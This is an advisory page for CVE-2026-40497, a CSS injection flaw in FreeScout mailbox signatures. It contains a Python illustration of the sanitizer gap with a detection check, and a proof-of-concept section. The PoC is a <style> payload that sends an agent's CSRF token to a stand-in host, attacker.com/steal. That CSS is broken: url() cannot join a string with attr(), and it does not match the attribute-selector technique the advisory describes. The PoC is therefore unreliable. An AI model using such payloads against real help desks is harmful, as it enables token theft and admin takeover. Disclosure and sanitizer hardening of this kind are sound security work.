Security Vulnerability Report
CVE-2026-40497 CVSS 8.1 HIGH


Published: 2026-04-21 03:16:08
Last Modified: 2026-04-23 16:32:05

Description

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's `Helper::stripDangerousTags()` removes `<script>`, `<form>`, `<iframe>`, `<object>` but does NOT strip `<style>` tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via `{!! $conversation->getSignatureProcessed([], true) !!}` in conversation views. CSP allows `style-src * 'self' 'unsafe-inline'`, so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.), a privilege escalation from agent to admin.

This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied `Helper::stripDangerousTags()` to the signature before saving. However, `stripDangerousTags()` only removes `script`, `form`, `iframe`, and `object` tags; it does NOT strip `<style>` tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix.
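The sanitizer gap described above, as an added illustration that is not FreeScout's code: a hypothetical Python re-implementation of the four-name deny list beside one that also drops `<style>`, a detection check a defender can run over stored signatures, and an allow-list sanitizer as the more robust alternative, all run over a constructed sample signature. The allow-list part goes beyond what the advisory states; the deny-list names are the ones it lists.

```python
import html, re
from html.parser import HTMLParser

# Constructed sample (not from the advisory): a plain signature followed by an
# inline stylesheet with inert CSS; mixed case and extra whitespace test the matchers.
SAMPLE_SIGNATURE = ('<p>Regards,<br>Support Team</p>'
                    '<STYLE  type="text/css">p { color: red; }</STYLE>')

# Hypothetical re-implementation of the deny-list behaviour the advisory describes
# for FreeScout < 1.8.213 (not the project's PHP code): four element names only.
LEGACY_DENYLIST = ("script", "form", "iframe", "object")
HARDENED_DENYLIST = LEGACY_DENYLIST + ("style",)   # adds the element that was missed

def strip_dangerous_tags(markup, denylist):
    """Remove each listed element with its contents, then any stray open/close tag."""
    for tag in denylist:
        markup = re.sub(rf"<\s*{tag}\b[^>]*>.*?<\s*/\s*{tag}\s*>", "", markup,
                        flags=re.I | re.S)
        markup = re.sub(rf"<\s*/?\s*{tag}\b[^>]*>", "", markup, flags=re.I)
    return markup

def contains_stylesheet(markup):
    """Defender-side check: does a stored signature still open a <style> element?"""
    return re.search(r"<\s*style\b", markup, re.I) is not None

class AllowlistSanitizer(HTMLParser):
    """Allow-list alternative: keep a few formatting tags, drop all attributes,
    escape text, and discard the contents of <style>/<script> entirely."""
    ALLOWED = {"p", "br", "b", "i", "strong", "em"}
    def __init__(self):
        super().__init__()          # convert_charrefs=True: text arrives decoded
        self.out, self._skip = [], False
    def handle_starttag(self, tag, attrs):
        if tag in ("style", "script"):
            self._skip = True
        elif tag in self.ALLOWED and not self._skip:
            self.out.append(f"<{tag}>")   # attributes are never copied through
    def handle_endtag(self, tag):
        if tag in ("style", "script"):
            self._skip = False
        elif tag in self.ALLOWED and tag != "br" and not self._skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))

def sanitize_allowlist(markup):
    p = AllowlistSanitizer()
    p.feed(markup); p.close()
    return "".join(p.out)
```

Running `contains_stylesheet` over every stored signature is a cheap way to find mailboxes that were edited while the incomplete fix was deployed.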

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:freescout:freescout:*:*:*:*:*:*:*:* - VULNERABLE
FreeScout < 1.8.213

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<style>
  /* CSS Injection PoC to exfiltrate CSRF token */
  /* Targeting the CSRF token input field by name */
  input[name="_token"] {
    /* Exfiltrate the token value via background image request */
    background-image: url("https://attacker.com/steal?token=" attr(value));
  }
  /* Alternative: Exfiltrate via generic attribute selector if value is not directly accessible */
  [data-csrf] {
    background-image: url("https://attacker.com/steal?token=" attr(data-csrf));
  }
</style>

References

https://github.com/freescout-help-desk/freescout/commit/5aa8d633216f65995e80a7d4a921b784acc94df4 - Patch
https://github.com/freescout-help-desk/freescout/releases/tag/1.8.213 - Release Notes
https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-fh99-wr77-pxq3 - Vendor Advisory

Weakness

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')